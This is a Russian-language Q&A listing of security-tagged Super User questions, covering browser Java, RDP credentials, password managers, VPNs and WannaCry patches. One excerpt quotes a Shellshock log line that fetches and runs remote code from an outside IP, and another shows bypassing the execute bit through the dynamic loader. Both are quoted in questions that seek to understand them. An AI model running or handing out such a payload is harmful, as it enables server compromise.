Вопросы с тегом «security»

Защита компьютерных систем и информации от таких угроз, как кража или уничтожение данных.

4
Какие функции я бы потерял, если бы отключил браузерную Java?
Я читаю, что отключение Java, а не JavaScript, сделает мой компьютер более безопасным от атак вредоносных программ. Все указывает на то, что это действительно сделает его более безопасным, но нет никаких реальных причин, как то, что я потеряю в процессе просмотра, во всяком случае. Может кто-нибудь сказать мне, что я …
23 security  browser  java 

3
Это атака или что-то, о чем нужно беспокоиться? Shellshock?
Увидел это в access.logна моем тестовом сервере: > 173.45.100.18 - - [26/Sep/2014:07:09:53 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 490 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget > http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; > perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\"" Ни одно из адресов не имеет отношения ко мне или нашему …

3
Подрыв флага выполнения в системах Linux. Почему это возможно?
Читая это , я обнаружил следующий эксплойт: % cp /usr/bin/id ~ % chmod -x ~/id % ls -al ~/id -rw-r--r-- 1 edd edd 22020 2012-08-01 15:06 /home/edd/id % ~/id zsh: permission denied: /home/edd/id % /lib/ld-linux.so.2 ~/id uid=1001(edd) gid=1001(edd) groups=1001(edd),1002(wheel) Этот фрагмент показывает, что мы можем тривиально обойти разрешения на выполнение …


3
Сохранены ли сохраненные учетные данные удаленного рабочего стола на локальном компьютере?
Сохранены ли сохраненные учетные данные удаленного рабочего стола (условно говоря) на локальном компьютере? По крайней мере, они нигде не хранятся в виде открытого текста, не так ли? Изменить: я понимаю присущие риски сохранения паролей. Конечно, хотя и есть спектр эффективности, например, сохранение пароля через что-то вроде CryptProtectData( что Google Chrome …

2
Где хранится мой сертификат сервера RDP?
Учитывая недавние проблемы атак типа «человек посередине», я фактически обратил внимание на предупреждение, которое я получаю при подключении к серверу: Выбрав Просмотр сертификата , я собирался проверить SHA1 отпечаток : Кому выдано : корсар эмитированных : корсар Действительно с : 9/5/2013 до 3/7/2014 Отпечатков (SHA1):‎e9 c5 d7 17 95 95 …


16
Менеджер паролей для нескольких компьютеров? [закрыто]
Закрыто. Этот вопрос не по теме . В настоящее время не принимает ответы. Хотите улучшить этот вопрос? Обновите вопрос, чтобы он соответствовал теме Супер пользователя. Закрыто 4 года назад . Есть ли менеджер паролей, который я могу использовать на нескольких компьютерах, чтобы запомнить все пароли, которые я использую на сайтах, …

3
Я параноик, или корпоративные брандмауэры цензурируют целые страны? [закрыто]
Закрыто . Этот вопрос должен быть более сфокусированным . В настоящее время не принимает ответы. Хотите улучшить этот вопрос? Обновите вопрос, чтобы он был сосредоточен только на одной проблеме, отредактировав этот пост . Закрыто 2 года назад . В последнее время, в последний год или около того, я заметил, что …

4
Как проверить, установлено ли конкретное обновление для системы безопасности Windows?
Учитывая, что эксплойт WannaCry Ransomware работает, я хотел проверить, есть ли на моем компьютере специальное обновление для системы безопасности, которое должно устранить уязвимость - по-видимому, MS17-010, если я понимаю уязвимость, и это действительно правильный патч. Как можно проверить эту деталь? Microsoft пытается дать некоторые подробности, но это бред для того, …

6
Защита паролем папки
Какие доступны варианты защиты паролем папки? Я говорю о том, что для доступа к папке требуется пароль, а не только права доступа пользователя. Является ли стороннее программное обеспечение безопасным и стабильным? Какие рекомендации?

5
Безопасен ли трафик https через незашифрованную беспроводную сеть?
Это то, что я задавался вопросом в течение длительного времени. Если, скажем, я использую Gmail через https, может ли кто-нибудь прочитать мои чаты и электронные письма, если я использую незащищенную беспроводную сеть? Я предполагаю, что данные будут в безопасности, поскольку они используют зашифрованное соединение. Есть что-нибудь еще, чтобы рассмотреть?

3
В чем разница между прокси и VPN?
Существует несколько поставщиков услуг, которые позволяют пользователю обходить межсетевые экраны или анонимно использовать свой веб-доступ. Некоторые из них используют прокси, некоторые используют VPN. Большинство людей говорят, что VPN обычно работают лучше, чем прокси. Они также, как правило, дороже. Например, прокси предоставит международному пользователю доступ к Pandora.com, но не Hulu.com. VPN …
21 security  vpn  proxy 


5
Должен ли я запустить свой маленький веб-сайт в порт 80, 8080 или 81?
Я использую небольшой веб-сайт, используя nginx. Поскольку (вероятно) не будет много трафика в течение срока службы моего сервера и чтобы избежать случайных DoS-атак, я подумываю настроить веб-сервер для прослушивания альтернативного порта вместо порта 80. Снижает ли прослушивание через альтернативный порт (81, 8080 и т. Д.) Риск атак или нарушений? Или …

Используя наш сайт, вы подтверждаете, что прочитали и поняли нашу Политику в отношении файлов cookie и Политику конфиденциальности.
Licensed under cc by-sa 3.0 with attribution required.